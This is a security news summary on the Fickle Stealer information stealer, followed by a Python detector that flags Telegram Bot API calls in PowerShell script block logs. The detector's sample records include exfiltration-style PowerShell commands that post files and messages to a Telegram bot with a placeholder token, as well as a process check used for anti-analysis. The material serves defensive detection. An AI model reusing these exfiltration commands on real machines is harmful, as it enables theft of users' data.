New Rust-based Fickle Malware Uses PowerShell for UAC Bypass and Data Exfiltration

20-June-24

The newly discovered Rust-based information stealer, Fickle Stealer, is being distributed through several delivery chains, including a VBA dropper, a VBA downloader, a link downloader, and an executable downloader; some of these chains use PowerShell scripts to bypass User Account Control (UAC) and relay victim information to a Telegram bot. Fortinet FortiGuard Labs noted that the malware, protected by a packer, performs anti-analysis checks before exfiltrating data to a remote server. It targets sensitive information from crypto wallets, browsers such as Chrome and Firefox, and applications such as AnyDesk and Discord. It also searches for files with specific extensions and receives a target list from the server for more comprehensive data collection. This disclosure follows Symantec's report on AZStealer, an open-source Python stealer that exfiltrates data via Discord webhooks or Gofile, underscoring the growing threat posed by information stealers.
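The summary above points to one concrete detection opportunity for defenders: a PowerShell script that relays data to a Telegram bot has to call the Telegram Bot API, whose URLs always follow the fixed shape `https://api.telegram.org/bot<token>/<method>`. The script below is an added example, not code from the Fortinet report or from the malware; it scans records in the style of PowerShell script block logging (Windows Event ID 4104) for such calls, identifies the web cmdlet used, and redacts the bot token before the finding is recorded. The host names, script text and bot token in the sample records are constructed placeholders, and the alias list assumes the default PowerShell aliases (`iwr`, `irm`, `curl`, `wget`).

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample records in the style of PowerShell script block logging
# (Event ID 4104, Microsoft-Windows-PowerShell/Operational). Host names and
# script text are illustrative only; the bot token is a placeholder, not a real value.
SAMPLE_SCRIPT_BLOCKS: List[Tuple[str, str]] = [
    ("host01", "Get-ChildItem -Path C:\\Users -Recurse -Include *.txt,*.docx"),
    ("host01", "Invoke-WebRequest -Uri 'https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendDocument' -Method Post -Form $payload"),
    ("host02", "Get-Process | Where-Object { $_.Name -eq 'wireshark' }"),
    ("host02", "irm 'https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendMessage' -Method Post -Body $body"),
    ("host03", "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"),
]

# Telegram Bot API calls have the form https://api.telegram.org/bot<token>/<method>.
# Group 1 captures the token, group 2 the API method (sendMessage, sendDocument, ...).
TELEGRAM_BOT_API = re.compile(
    r"https?://api\.telegram\.org/bot([^/'\"\s]+)/(\w+)", re.IGNORECASE
)

# PowerShell web cmdlets and their default aliases.
WEB_CMDLET = re.compile(
    r"\b(Invoke-WebRequest|Invoke-RestMethod|iwr|irm|curl|wget)\b", re.IGNORECASE
)


def redact_token(script: str) -> str:
    """Replace the bot token with a fixed marker so the finding can be shared safely."""
    return TELEGRAM_BOT_API.sub(r"https://api.telegram.org/bot[REDACTED]/\2", script)


def classify_script_block(host: str, script: str) -> Optional[Dict[str, str]]:
    """Return a finding if the script block calls the Telegram Bot API, else None."""
    match = TELEGRAM_BOT_API.search(script)
    if not match:
        return None
    cmdlet = WEB_CMDLET.search(script)
    return {
        "host": host,
        "method": match.group(2),
        "cmdlet": cmdlet.group(1) if cmdlet else "unknown",
        "script": redact_token(script),
    }


def scan_script_blocks(records: List[Tuple[str, str]]) -> List[Dict[str, str]]:
    """Run the classifier over (host, script) records and collect the findings."""
    findings = []
    for host, script in records:
        finding = classify_script_block(host, script)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"{f['host']}: Telegram Bot API '{f['method']}' via {f['cmdlet']} :: {f['script']}")
```

Script block logging has to be enabled for these records to exist at all, and a match is a lead rather than a verdict: an environment that legitimately runs Telegram bots from PowerShell will need an allow-list keyed on host or script hash. The token redaction matters because Event ID 4104 captures the full script text, so raw findings would otherwise carry the attacker's credential into tickets and chat channels.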


